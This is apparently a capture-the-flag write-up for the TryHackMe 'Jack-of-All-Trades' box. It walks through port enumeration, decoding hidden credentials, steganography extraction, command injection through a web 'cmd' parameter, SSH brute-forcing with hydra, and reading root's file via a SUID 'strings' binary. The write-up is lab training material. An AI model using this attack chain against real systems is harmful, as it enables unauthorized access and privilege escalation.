Jack-of-All-Trades TryHackMe | write-up

Hello everyone, today's machine is so fun to break, I enjoyed every step I practised, Jack-of-All-Trades CTF challenge box was created for the Securi-Tay conference run on the 28th of February, 2020 by the Hacksoc.

Let's start with some enumeration!

root@kali:~# nmap -sC -sV 10.10.37.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-12 13:15 UTC
Nmap scan report for ip-10-10-37-180.eu-west-1.compute.internal (10.10.37.180)
Host is up (0.00079s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
|   2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
|   256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_  256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
MAC Address: 02:EC:EB:D2:86:84 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.36 seconds
root@kali:~# 

as we can see we have two ports open SSH on 80 and HTTP on 22, they switched the port numbers for each one, It can be tricky if you don't pay attention. if we try to access the site it informs us that the request is cancelled for security purposes, because the port is used for different things {SSH} not HTTP.

root@kali:~# echo "UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9iaHVudGluZyEgSGlzIGVuY29kaW5nIHN5c3RlbXMgYXJlIGFtYXppbmchIEFsc28gZ290dGEgcmVtZW1iZXIgeW91ciBwYXNzd29yZDogdT9XdEtTcmFxCg==" | base64 -d
Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?******q
root@kali:~# 

Later checking the web source code, I noticed a base64 and a note for the user Jack in case he forgets his credentials. I visited the site but the credentials we have doesn't work, I tried to guess the user since he loves dinosaurs, well after I found the name of the dinosaurs all I read was stego! let's download the images on the web and see what's hidden.

GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=

Base32 > Hex > Rot13

root@kali:~/Desktop# steghide extract -sf stego.jpg 
Enter passphrase: 
wrote extracted data to "creds.txt".
root@kali:~/Desktop# cat creds.txt 
Hehe. Gotcha!

You're on the right path, but wrong image!
root@kali:~/Desktop#

root@kali:~/Desktop# steghide extract -sf header.jpg 
Enter passphrase: 
wrote extracted data to "cms.creds".
root@kali:~/Desktop#

after i logged in it sent us to this index.php file, that is very thirsty for commands !

I started after browsing the machine, went to the home directory to check how many users directories we have and something interesting took my attention, a wordlist ...

http://10.10.68.189:22/nnxhweOV/index.php?cmd=ls /home/

let's do some brute-forcing and see if the pass list we found is still containing password used by user Jack

root@kali:~# hydra -l jack -P jack_pass.lst ssh://10.10.68.189:80/
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-12 15:07:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:1/p:25), ~2 tries per task
[DATA] attacking ssh://10.10.68.189:80/
[80][ssh] host: 10.10.68.189   login: jack   password: IT*************@
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-12 15:07:09
root@kali:~#

root@kali:~# ssh jack@10.10.68.189 -p 80
jack@10.10.68.189's password: 
jack@jack-of-all-trades:~$ ls
user.jpg
jack@jack-of-all-trades:~$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...

Privilege escalation

jack@jack-of-all-trades:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/strings
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/procmail
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
jack@jack-of-all-trades:~$ 

if you are not familiar with is strings command, it return each string of printable characters in files, you can familiarize yourself more by reading strings manual in Linux "man strings"

jack@jack-of-all-trades:~$ /usr/bin/strings /root/root.txt
ToDo:
1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures?
2.Make T-Rex model!
3.Meet up with Johny for a pint or two
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?
5.Remember to finish that contract for Lisa.
6.Delete this: securi-tay2020_{********************************}
jack@jack-of-all-trades:~$

And we have the root flag! Happy hacking!